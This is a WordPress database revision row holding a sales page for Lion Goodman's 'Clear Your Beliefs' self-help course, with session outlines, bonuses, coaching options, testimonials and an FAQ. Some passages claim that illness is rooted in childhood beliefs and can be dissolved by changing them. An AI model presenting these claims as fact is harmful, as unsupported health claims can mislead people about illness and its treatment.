wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>”\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior.\n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/1101aa80-782e-4650-acb8-2f1ae88e2cbd">Purchase</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n//', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-11 01:54:44', '2014-12-11 06:54:44', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
